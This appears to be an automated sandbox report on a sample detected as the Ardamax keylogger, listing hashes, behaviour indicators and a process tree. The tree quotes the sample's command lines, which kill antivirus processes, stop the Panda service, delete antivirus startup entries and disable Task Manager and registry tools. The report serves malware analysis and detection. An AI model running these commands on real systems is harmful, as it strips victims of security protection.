ardamax | ef90f55d789dc83abda7fad3e66cd87a0069fe0439ed31b0611db5e30a3d66b5

Analysis

max time kernel
3s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2024 15:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe
Size

2.5MB
MD5

0f5f2e640ed8bfb8d23cdc99a1d1b586
SHA1

a08db0712aa28c3c7f9e80270acb568ec77e14a7
SHA256

ef90f55d789dc83abda7fad3e66cd87a0069fe0439ed31b0611db5e30a3d66b5
SHA512

717aa5248f21ad8c5a30dc74a1ae28b177e31ddacb329766457f70c2fc3fa045450513df7bf6685cab34d6c56c96c919dfcfb5282ae0bde6aa499c295ca7a59b
SSDEEP

49152:F5Geq1NlCqtFuVZwOMCODC5Geq1NlCqtFuVZwOMCODz:6eq1ptFUZkDD5eq1ptFUZkDDz

Score

10^/10

ardamax discovery keylogger stealer

Malware Config

Signatures

Ardamax
A keylogger first seen in 2013.
keylogger stealer ardamax

Ardamax main executable 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023627-24.dat	family_ardamax

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	SpeeD Hack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe

Executes dropped EXE 2 IoCs

pid	Process
4620	SpeeD Hack.exe
6908	SpeeD Hack.exe

Loads dropped DLL 1 IoCs

pid	Process
4620	SpeeD Hack.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\28463\SAKE.001	SpeeD Hack.exe
File created	C:\Windows\SysWOW64\28463\SAKE.006	SpeeD Hack.exe
File created	C:\Windows\SysWOW64\28463\SAKE.007	SpeeD Hack.exe
File created	C:\Windows\SysWOW64\28463\SAKE.exe	SpeeD Hack.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpeeD Hack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 60 IoCs

evasion

pid	Process
6000	taskkill.exe
7048	taskkill.exe
5924	taskkill.exe
6964	taskkill.exe
7072	taskkill.exe
3344	taskkill.exe
2684	taskkill.exe
5084	taskkill.exe
5932	taskkill.exe
5916	taskkill.exe
5080	taskkill.exe
5872	taskkill.exe
7100	taskkill.exe
4676	taskkill.exe
4972	taskkill.exe
464	taskkill.exe
5908	taskkill.exe
7064	taskkill.exe
4496	taskkill.exe
2256	taskkill.exe
3332	taskkill.exe
1968	taskkill.exe
5944	taskkill.exe
7056	taskkill.exe
4008	taskkill.exe
1868	taskkill.exe
1032	taskkill.exe
6996	taskkill.exe
7080	taskkill.exe
388	taskkill.exe
5044	taskkill.exe
5992	taskkill.exe
5984	taskkill.exe
1936	taskkill.exe
6008	taskkill.exe
7004	taskkill.exe
1892	taskkill.exe
5104	taskkill.exe
5880	taskkill.exe
6988	taskkill.exe
7088	taskkill.exe
3476	taskkill.exe
1512	taskkill.exe
2344	taskkill.exe
5976	taskkill.exe
4404	taskkill.exe
2016	taskkill.exe
4952	taskkill.exe
7012	taskkill.exe
2424	taskkill.exe
7024	taskkill.exe
5100	taskkill.exe
1156	taskkill.exe
5900	taskkill.exe
6972	taskkill.exe
5968	taskkill.exe
5960	taskkill.exe
4460	taskkill.exe
844	taskkill.exe
7032	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	rundll32.exe

Modifies registry key 1 TTPs 44 IoCs

Modify Registry

T1112

pid	Process
3740	reg.exe
1004	reg.exe
5328	reg.exe
5300	reg.exe
3476	reg.exe
5344	reg.exe
2860	reg.exe
1396	reg.exe
6592	reg.exe
6724	reg.exe
5852	reg.exe
3952	reg.exe
3676	reg.exe
4140	reg.exe
5532	reg.exe
1356	reg.exe
5416	reg.exe
348	reg.exe
7432	reg.exe
5176	reg.exe
2424	reg.exe
6308	reg.exe
5404	reg.exe
4528	reg.exe
6908	reg.exe
5584	reg.exe
5664	reg.exe
4700	reg.exe
5316	reg.exe
1396	reg.exe
6908	reg.exe
1192	reg.exe
6476	reg.exe
6512	reg.exe
7324	reg.exe
7568	reg.exe
7528	reg.exe
5552	reg.exe
5080	reg.exe
3344	reg.exe
6584	reg.exe
6164	reg.exe
8132	reg.exe
1536	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	3344	taskkill.exe
Token: SeDebugPrivilege	4008	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	2344	taskkill.exe
Token: SeDebugPrivilege	3476	taskkill.exe
Token: SeDebugPrivilege	5100	taskkill.exe
Token: SeDebugPrivilege	464	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	4496	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1328 wrote to memory of 3344	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	89
PID 1328 wrote to memory of 3344	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	89
PID 1328 wrote to memory of 3344	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	89
PID 1328 wrote to memory of 5100	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	90
PID 1328 wrote to memory of 5100	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	90
PID 1328 wrote to memory of 5100	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	90
PID 1328 wrote to memory of 5016	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	91
PID 1328 wrote to memory of 5016	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	91
PID 1328 wrote to memory of 5016	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	91
PID 1328 wrote to memory of 4496	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	93
PID 1328 wrote to memory of 4496	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	93
PID 1328 wrote to memory of 4496	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	93
PID 1328 wrote to memory of 1868	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	94
PID 1328 wrote to memory of 1868	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	94
PID 1328 wrote to memory of 1868	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	94
PID 1328 wrote to memory of 5044	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	95
PID 1328 wrote to memory of 5044	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	95
PID 1328 wrote to memory of 5044	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	95
PID 1328 wrote to memory of 4008	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	96
PID 1328 wrote to memory of 4008	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	96
PID 1328 wrote to memory of 4008	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	96
PID 1328 wrote to memory of 2344	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	98
PID 1328 wrote to memory of 2344	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	98
PID 1328 wrote to memory of 2344	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	98
PID 1328 wrote to memory of 2016	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	99
PID 1328 wrote to memory of 2016	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	99
PID 1328 wrote to memory of 2016	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	99
PID 1328 wrote to memory of 1140	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	100
PID 1328 wrote to memory of 1140	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	100
PID 1328 wrote to memory of 1140	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	100
PID 1328 wrote to memory of 1512	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	101
PID 1328 wrote to memory of 1512	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	101
PID 1328 wrote to memory of 1512	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	101
PID 1328 wrote to memory of 3476	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	102
PID 1328 wrote to memory of 3476	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	102
PID 1328 wrote to memory of 3476	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	102
PID 1328 wrote to memory of 1156	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	103
PID 1328 wrote to memory of 1156	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	103
PID 1328 wrote to memory of 1156	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	103
PID 1328 wrote to memory of 464	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	104
PID 1328 wrote to memory of 464	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	104
PID 1328 wrote to memory of 464	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	104
PID 1328 wrote to memory of 2684	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	105
PID 1328 wrote to memory of 2684	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	105
PID 1328 wrote to memory of 2684	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	105
PID 1328 wrote to memory of 388	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	106
PID 1328 wrote to memory of 388	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	106
PID 1328 wrote to memory of 388	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	106
PID 1328 wrote to memory of 2256	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	107
PID 1328 wrote to memory of 2256	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	107
PID 1328 wrote to memory of 2256	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	107
PID 1328 wrote to memory of 4032	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	108
PID 1328 wrote to memory of 4032	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	108
PID 1328 wrote to memory of 4032	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	108
PID 1328 wrote to memory of 2764	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	109
PID 1328 wrote to memory of 2764	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	109
PID 1328 wrote to memory of 2764	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	109
PID 1328 wrote to memory of 4748	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	110
PID 1328 wrote to memory of 4748	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	110
PID 1328 wrote to memory of 4748	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	110
PID 1328 wrote to memory of 208	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	111
PID 1328 wrote to memory of 208	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	111
PID 1328 wrote to memory of 208	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	111
PID 1328 wrote to memory of 2984	1328	0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe	112

C:\Users\Admin\AppData\Local\Temp\0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im egui.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ekrn.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Panda anti-virus service"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5016
- - C:\Windows\SysWOW64\net.exe
    net stop "Panda anti-virus service"
    3⤵
    PID:7252
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Panda anti-virus service"
      4⤵
      PID:1512
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ApVxdWin.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4496
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im AVENGINE.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1868
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im pavsrv51.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5044
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im psimreal.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4008
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im PsImSvc.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2344
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im WebProxy.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1140
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
    3⤵
    - Modifies registry key
    PID:7528
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcagent.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcdash.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3476
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mghtml.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1156
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcmnhdlr.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:464
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsshld.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im McVSEscn.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:388
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsftsn.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4032
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:6164
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2764
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
    3⤵
    - Modifies registry key
    PID:7324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4748
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
    3⤵
    - Modifies registry key
    PID:7432
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:208
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
    3⤵
    - Modifies registry key
    PID:7568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2984
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
    3⤵
    - Modifies registry key
    PID:8132
- C:\Users\Admin\AppData\Local\Temp\SpeeD Hack.exe
  "C:\Users\Admin\AppData\Local\Temp\SpeeD Hack.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:4620
- - C:\Windows\SysWOW64\28463\SAKE.exe
    "C:\Windows\system32\28463\SAKE.exe"
    3⤵
    PID:7480
- - C:\Users\Admin\AppData\Local\Temp\HastyMu.exe
    "C:\Users\Admin\AppData\Local\Temp\HastyMu.exe"
    3⤵
    PID:7816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:6724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:4560
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:3476
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:3296
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:4140
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im egui.exe
  2⤵
  - Kills process with taskkill
  PID:4952
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ekrn.exe
  2⤵
  - Kills process with taskkill
  PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Panda anti-virus service"
  2⤵
  PID:3252
- - C:\Windows\SysWOW64\net.exe
    net stop "Panda anti-virus service"
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Panda anti-virus service"
      4⤵
      PID:2984
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ApVxdWin.exe
  2⤵
  - Kills process with taskkill
  PID:4972
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im AVENGINE.exe
  2⤵
  - Kills process with taskkill
  PID:4404
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im pavsrv51.exe
  2⤵
  - Kills process with taskkill
  PID:844
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im psimreal.exe
  2⤵
  - Kills process with taskkill
  PID:2424
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im PsImSvc.exe
  2⤵
  - Kills process with taskkill
  PID:4460
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im WebProxy.exe
  2⤵
  - Kills process with taskkill
  PID:5104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
  2⤵
  PID:4384
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
    3⤵
    - Modifies registry key
    PID:5316
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcagent.exe
  2⤵
  - Kills process with taskkill
  PID:1936
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcdash.exe
  2⤵
  - Kills process with taskkill
  PID:4676
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mghtml.exe
  2⤵
  - Kills process with taskkill
  PID:1968
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcmnhdlr.exe
  2⤵
  - Kills process with taskkill
  PID:3332
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsshld.exe
  2⤵
  - Kills process with taskkill
  PID:1892
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im McVSEscn.exe
  2⤵
  - Kills process with taskkill
  PID:5080
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsftsn.exe
  2⤵
  - Kills process with taskkill
  PID:5084
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
    3⤵
    - Modifies registry key
    PID:5852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
  2⤵
  PID:3944
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
    3⤵
    - Modifies registry key
    PID:6908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
    3⤵
    - Modifies registry key
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
  2⤵
  PID:4320
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
    3⤵
    - Modifies registry key
